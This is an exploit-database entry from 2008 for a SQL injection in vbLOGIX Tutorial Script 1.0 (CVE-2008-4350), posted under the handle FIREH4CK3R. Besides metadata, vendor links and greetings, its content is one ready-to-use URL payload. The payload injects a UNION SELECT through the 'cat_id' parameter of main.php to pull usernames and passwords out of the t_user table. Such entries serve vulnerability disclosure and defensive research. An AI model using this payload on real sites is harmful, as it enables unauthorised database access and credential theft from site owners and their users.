vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection

Author: FIREH4CK3R
type: webapps
platform: php
port: 
date_added: 2008-09-11 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-48671;CVE-2008-4350;OSVDB-48107 
tags: 
aliases:  
screenshot_url:  
application_url: 

#=====================================================================================================
#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit
#=====================================================================================================
#
#
#Venedor site : http://www.vblogix.com/
#
#Demo site: http://www.vb-demo.com/
#
#Version : v1.0
#
#=====================================================================================================
#
#DORK : no have
#
#
#Exploit :
#--------------------------------
# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
#
#=====================================================================================================
#Discoverd By : FIREH4CK3R
#
#Contact : firehacker_msn[at]hotmail.com
#
#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR
#
#
#=====================================================================================================

# milw0rm.com [2008-09-12]